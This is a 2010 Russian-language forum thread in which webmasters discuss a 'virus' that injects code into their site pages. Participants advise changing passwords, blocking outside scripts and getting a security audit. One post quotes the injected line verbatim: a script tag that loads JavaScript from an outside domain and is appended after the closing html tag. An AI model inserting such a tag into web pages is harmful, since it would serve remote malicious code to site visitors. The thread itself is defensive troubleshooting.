Форум: Форум PHPФорум ApacheФорум Регулярные ВыраженияФорум MySQLHTML+CSS+JavaScriptФорум FlashРазное
Новые темы: 0000000
MySQL 5. В подлиннике. Авторы: Кузнецов М.В., Симдянов И.В. MySQL на примерах. Авторы: Кузнецов М.В., Симдянов И.В. C++. Мастер-класс в задачах и примерах. Авторы: Кузнецов М.В., Симдянов И.В. PHP. Практика создания Web-сайтов (второе издание). Авторы: Кузнецов М.В., Симдянов И.В. Объектно-ориентированное программирование на PHP. Авторы: Кузнецов М.В., Симдянов И.В.
ВСЕ НАШИ КНИГИ
Консультационный центр SoftTime

Разное

Выбрать другой форум

 

Здравствуйте, Посетитель!

вид форума:
Линейный форум (новые сообщения вниз) Структурный форум

тема: Вирус

Сообщения:  [1-10]   [11-11] 

 
 автор: lElectroHardl   (29.08.2010 в 17:10)   письмо автору
 
   для: Helen_rr   (29.08.2010 в 17:04)
 

1. 2-е сообщение (от меня) прочти.
2. Изменить все пароли.
3. Потратить день на нахождения иных "дыр".
4. Исправить все дыры.

А еще лучше, написать в Free-Lance с просьбой: "Нужен краш-тест безопасности сайта". Твой сайт взломают (где это возможно), скажут какие дыры они нашли, ты их исправишь.
Может идея бредовая, но думаю поможет.

  Ответить  
 
 автор: Helen_rr   (29.08.2010 в 17:04)   письмо автору
 
   для: lElectroHardl   (28.08.2010 в 17:50)
 

вот я и спрашиваю - как?! менять явки-пароли... что?

  Ответить  
 
 автор: lElectroHardl   (28.08.2010 в 17:50)   письмо автору
 
   для: Helen_rr   (28.08.2010 в 14:43)
 

Вот вы удалил этот тег. И? Что мешает его туда опять вставить (тому, его туда в 1-й раз вставил)?
Такие вещи нужно резать на корню! А не "тьфу-тьфу, надеюсь пронесет".

  Ответить  
 
 автор: Helen_rr   (28.08.2010 в 14:43)   письмо автору
 
   для: nameIvan   (26.08.2010 в 13:33)
 

У меня пару дней назад случилась такая бяка, скрипт появился после тега
</html>
<script type="text/javascript" src="http://nuttypiano.com/Debug.js"></script>
<!--eb6851b3939aaca2dcdd7584ba19ccdf-->

Удалили эту строчку, пока тьфу-тьфу-тьфу всё ОК.
А расскажите поподробнее, что сделать чтобы подобного не возникало?

Друг говорит, что есть два варианта:
- либо хакнули баннерную сеть каталога, баннер которого размещён на глав.странице сайта
- либо хакнули хост-провайдера

Склоняюсь к первому варианту.

  Ответить  
 
 автор: Axxil   (26.08.2010 в 15:22)   письмо автору
 
   для: nameIvan   (26.08.2010 в 14:09)
 

Это не важно. Он сам по себе дырявый. Была у меня такая напасть пару лет назад, total снёс - всё прекратилось.

  Ответить  
 
 автор: lElectroHardl   (26.08.2010 в 14:32)   письмо автору
 
   для: nameIvan   (26.08.2010 в 14:09)
 

Вам нужно запретить все, что приходит с других хотсов. надеюсь поможет.

  Ответить  
 
 автор: nameIvan   (26.08.2010 в 14:09)   письмо автору
 
   для: Axxil   (26.08.2010 в 14:07)
 

Да, в нем не стоит галочка Запомнить пароль.

  Ответить  
 
 автор: Axxil   (26.08.2010 в 14:07)   письмо автору
 
   для: nameIvan   (26.08.2010 в 13:58)
 

Total commander используете?

  Ответить  
 
 автор: nameIvan   (26.08.2010 в 13:58)   письмо автору
 
   для: lElectroHardl   (26.08.2010 в 13:54)
 

В страницу вставляется только ссылка на сайт. При загрузке страницы подгружается левый сайт, на него антивирь и ругается.
Пароли не сменил, потому что оторвали от компа и забыл поменять.

  Ответить  
 
 автор: lElectroHardl   (26.08.2010 в 13:54)   письмо автору
 
   для: nameIvan   (26.08.2010 в 13:33)
 

Если вирус вставляет только адрес скрипта, то можно запретить подключения скриптов с чужого хоста. Делается это наверное в .htaccess

А если вирус вставляет сам скрипт (что просто странно), то не знаю.

От чего вы не меняли пароли?

  Ответить  

Сообщения:  [1-10]   [11-11] 

Форум разработан IT-студией SoftTime
Rambler's Top100
вверх

Rambler's Top100 Яндекс.Метрика Яндекс цитирования